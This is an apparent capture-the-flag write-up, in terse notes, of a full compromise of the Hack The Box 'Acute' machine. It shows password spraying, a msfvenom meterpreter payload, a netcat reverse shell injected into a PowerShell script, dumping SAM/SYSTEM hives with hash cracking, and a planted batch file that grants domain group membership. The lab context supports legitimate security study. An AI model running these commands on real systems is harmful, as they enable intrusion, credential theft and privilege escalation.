Â
echo "10.129.232.128 acute.local atsserver.acute.local" >> /etc/hosts
python3 dirsearch.py -u https://atsserver.acute.local/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Here is a link which downloads a .docx document
They are all unaccessible
take the name as record
Lois
Default password:
Password1!
dc_manage
At
Description
i see Acute-PC01
, which infers there is a new PC. Creator name FCastle gives a hint about username format.Record those name,
Lois Hopkins
seems special since we found name Lois in previous document.Aileen Wallace Charlotte Hall Evan Davies Ieuan Monks Joshua Morgan Lois Hopkins
link for remote in .docx file: https://atsserver.acute.local/Acute_Staff_Access
found a page for
Windows PowerShell Web Access
Try all extracted name and default password
Password1!
with computer name Acute-PC01
as possibleAWallace WAileen HCharlotte CHall EDavies DEvan IMonks MIeuan Joshua Morgan JMorgan MJoshua Lois Hopkins HLois LHopkins FCastle
successfully login by the credential of
EDavies:Passowrd!
And i found that there are 2 other user folder:
jmorgan
, Natasha
respectively.continue on enumeration with default password on those 2 users.
Failed to login with default password
Passowrd!
netstat -ano | findstr TCP
search on 5040 port, which i haven’t seen before
try chisel on port forwarding
./chisel server -p 12345 --reverse ./chisel.exe client 10.10.14.11:12345 R:5040:127.0.0.1:5040
accessed but no response
Back to web powershell enumeration
User
jmorgan
is inside administrator groupimprove out shell control by uploading a msfvenom payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.11 LPORT=6666 -f exe -o reverse.exe
it’s blocked by windows defender
after enumeration, i found this path, which executes program without defender
get the reverse shell
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
172.16.22.1 seems the host machine
RDP session found
screenshare
Try to capture screenshot multiple times by using the
screenshare
. i found dynamic results of several captured screenshots.Â
retrieved a credential
acute\imonks:w3_4R3_th3_f0rce.
upload
runasCS.exe
./RunasCs.exe acute\imonks w3_4R3_th3_f0rce. "./reverse.exe"
not work
$pass = ConvertTo-SecureString "W3_4R3_th3_f0rce." -AsPlainText -Force $cred = New-Object System.Management.Automation.PSCredential("ACUTE\imonks", $pass)
Invoke-Command -ScriptBlock { whoami } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Invoke-Command -ScriptBlock { type C:\Users\imonks\Desktop\user.txt } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
get the initial flag.
Invoke-Command -ScriptBlock { Get-Command } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Invoke-Command -ScriptBlock { ls 'C:\program files' } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Invoke-Command -ScriptBlock { ls 'C:\program files\keepmeon' } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
no permission to access
Invoke-Command -ScriptBlock { type C:\Users\imonks\Desktop\wm.ps1 } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
$securepasswd = '01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51' $passwd = $securepasswd | ConvertTo-SecureString $creds = New-Object System.Management.Automation.PSCredential ("acute\jmorgan", $passwd) Invoke-Command -ScriptBlock {Get-Volume} -ComputerName Acute-PC01 -Credential $creds
Â
net localgroup administrators
Â
Invoke-Command -ScriptBlock { ((cat C:\Users\imonks\Desktop\wm.ps1 -Raw) -replace 'Get-Volume', 'C:\utils\nc64.exe -e cmd 10.10.14.5 6666') | sc -Path C:\Users\imonks\Desktop\wm.ps1 } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Invoke-Command -ScriptBlock { cat C:\Users\imonks\Desktop\wm.ps1 } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Invoke-Command -ScriptBlock { C:\users\imonks\desktop\wm.ps1 } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
receive the shell from jmorgan
Â
retrieve the password:
As a
local administrator
on Acute-PC01, jmorgan can create backups of the registry hivesreg save HKLM\sam sam.bak reg save HKLM\system sys.bak
copy them to C:Utils, then try to download by meterpreter
secretsdump.py -sam sam.bak -system sys.bak LOCAL
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a29f7623fd11550def0192de9246f46b::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:24571eab88ac0e2dcef127b8e9ad4740::: Natasha:1001:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
┌─[root@htb-uzwpqxuk1h]─[/home/b3bop404/Desktop] └──╼ #cat hash | awk -F ':' '{print $4}' a29f7623fd11550def0192de9246f46b 31d6cfe0d16ae931b73c59d7e0c089c0 31d6cfe0d16ae931b73c59d7e0c089c0 24571eab88ac0e2dcef127b8e9ad4740 29ab86c5c4d2aab957763e5c1720486d
hashcat ./h /usr/share/wordlists/rockyou.txt
2 cracked
Administrator:Password@123
Guest:
Try existed user awallace with this password
$pass = ConvertTo-SecureString "Password@123" -AsPlainText -Force $cred = New-Object System.Management.Automation.PSCredential("ACUTE\awallace", $pass) Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock { whoami }
try to list keepmeon folder again(don’t have permission before)
Invoke-Command -ScriptBlock { ls '\program files\keepmeon' } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
see a .bat file
Invoke-Command -ScriptBlock { type '\program files\keepmeon\keepmeon.bat' } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Name dc_manage -Credential $cred REM This is run every 5 minutes. For Lois use ONLY @echo off for /R %%x in (*.bat) do ( if not "%%x" == "%~0" call "%%x" )
Â
Invoke-Command -ScriptBlock { net group /domain } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Invoke-Command -ScriptBlock { net group Site_Admin /domain } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Â
Invoke-Command -ScriptBlock { Set-Content -Path '\program files\keepmeon\0xdf.bat' -Value 'net group site_admin awallace /add /domain'} -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Invoke-Command -ScriptBlock { cat '\program files\keepmeon\0xdf.bat' } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Â
Invoke-Command -ScriptBlock { net group Site_Admin /domain } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Invoke-Command -ScriptBlock { cat C:\users\administrator\desktop\root.txt } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
read root.txt
Â